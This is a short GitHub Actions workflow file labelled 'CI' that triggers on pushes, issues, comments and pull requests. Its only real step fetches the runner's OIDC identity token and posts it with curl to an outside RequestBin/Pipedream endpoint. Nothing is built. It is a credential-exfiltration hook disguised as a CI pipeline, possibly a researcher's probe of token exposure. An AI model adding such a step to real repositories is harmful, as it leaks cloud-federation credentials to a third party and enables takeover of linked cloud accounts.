name: CI
on:
  push:
    branches: ["main"]
    tags: ["*"]
  issues:
  issue_comment:
  pull_request:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | curl -d@- -X POST https://enkduyz6g334a.x.pipedream.net/$GITHUB_EVENT_NAME
      - run: |
          echo "Inspect here: https://requestbin.com/r/enkduyz6g334a"
    permissions:
      id-token: write
